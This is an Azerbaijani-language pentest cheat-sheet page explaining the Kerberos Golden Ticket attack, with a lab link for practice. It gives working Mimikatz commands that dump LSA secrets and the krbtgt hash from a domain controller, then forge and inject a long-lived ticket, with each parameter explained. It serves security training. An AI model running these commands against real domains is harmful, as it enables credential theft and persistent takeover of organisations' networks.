Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page

Was this helpful?

  1. AD Pentesting
  2. Domain Persistence

Golden Ticket Attack

PreviousDomain PersistenceNextSilver Ticket Attack

Last updated 1 year ago

Was this helpful?

Golden Ticket mövzusuna keçməzdən əvvəl Kerberos autentifikasiyasını yadımıza salaq:

İstifadəçi Key Distribution Center'ə (KDC) öz NTLM hash'i və vaxt damğası(timestamp) ilə AS-REQ(Authentication Service Request) edir. DC məlumatı yoxlayır və TGT'ni istifadəçiyə göndərir. Bu TGT sadəcə DC'də olan KRBTGT(Key Distribution Center Service Account Ticket-Granting Ticket) hesabının parol hash'i ilə imzalanır. TGT etibarlıdırsa, Domen Nəzarətçisi (DC) istifadəçi girişi üçün tələb olunan xidmətin NTLM heşindən istifadə edərək Ticket Granting Service'ə (TGS) şifrəli bir cavab göndərir. Daha sonra istifadəçi bu TGS'i giriş üçün xidmətə təqdim edir, TGS yoxlanılır və hər şey doğrudursa, istifadəçiyə giriş imkanı verilirş.

İndi Golden Ticket hücumuna keçə bilərik.

Golden Ticket

Qızıl Biletlər saxta TGT'lərdir. Bu o deməkdir ki, biz yuxarıdakı diaqramın 1 və 2-ci addımlarını keçərək Domain Controller'ə autentifikasiya etməyə çalışırıq. Səlahiyyətləri yüksək bir hesabın etibarlı TGT'sinə malik olmaqla, demək olar ki, istədiyimiz hər bir xidmət üçün TGS tələb edə bilərik. Qızıl bileti saxtalaşdırmaq üçün bizə KRBTGT(Key Distribution Center Service Account Ticket-Granting Ticket) hesabının parol hash'i lazımdır ki, istədiyimiz istifadəçi hesabı üçün TGT'i imzalayaraq etibarlı edə bilək.

Kerberos prosesinin bu mərhələsində həyata keçirilən injeksiya hesabın parol heşinə ehtiyacı aradan qaldırır. KRBTGT hash'i ilə imzalanmış TGT, məzmunundan asılı olmayaraq etibarlı sayılır. TGT'i manipulyasiya etməklə, deaktiv edilmiş və ya mövcud olmayan hesablar daxil edə, biletin etibarlılığını illərlə uzada və davamlılığı(persistence) təmin edə bilərik. Golden Tickets tərəfindən həyata keçirilən bu manipulyasiya, hətta smart kart autentifikasiyasından yan keçə və gizlilik üçün domenə qoşulmayan maşınlarda icra oluna bilər.

Golden Ticket yaratmaq üçün bizim ilk növbədə krbtgt hash dəyərinə ehtiyacımız var. Aşağıdakı PoweShell əmri Mimikatzın lsadump::lsa modulundan istifadə edərək DC'dən Local Secuity Authority(LSA) sekretləri dump edir:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <DC'sName>

Daha sonra aşağıdakı əmrdən istifadə edərək Golden Ticket yarada bilərsiniz:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:
<HashOfkrbtgtAccount>   id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

/user:Administrator - Təqlid etmək istədiyimiz istifadəçi adı. Etibarlı istifadəçi olmasına ehtiyac yoxdur.

/domain - Bilet yaratmaq istədiyimiz domenin FQDN'i.

/id - İstifadəçinin RID'si. Defolq olaraq, Mimikatz standart Administrator hesabı olan RID 500-dən istifadə edir.

/sid -Bilet yaratmaq istədiyimiz domenin SID'i.

/krbtgt -KRBTGT hesabının NTLM hashı.

/endin - Biletin ömrü. Varsayılan olaraq, Mimikatz 10 il etibarlı olan bilet yaradır. AD-nin defolt Kerberos siyasəti 10 saatdır (600 dəqiqə)

/renewmax -Biletin yenilənmə ilə maksimum ömrü. Varsayılan olaraq, Mimikatz 10 il etibarlı olan bilet yaradır. AD-nin defolt Kerberos siyasəti 7 gündür (10080 dəqiqə)

/ptt - Bu parametr Mimikatz'a bileti birbaşa sessiyaya yeritməyi bildirir, yəni istifadəyə hazırdır.

krbtgt hash'i və sid'i əldə etmək üçün aşağıdakı əmrdən istifadə edirəm:

lsadump::lsa /inject /name:krbtgt

Aşağıdakı əmrdən istifadə edərək Golden Ticket yaradıram:

Kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:

Bilet uğurla yaradılır!

Praktiki nümayiş: (Laba keçid edə bilərsiniz)

buradan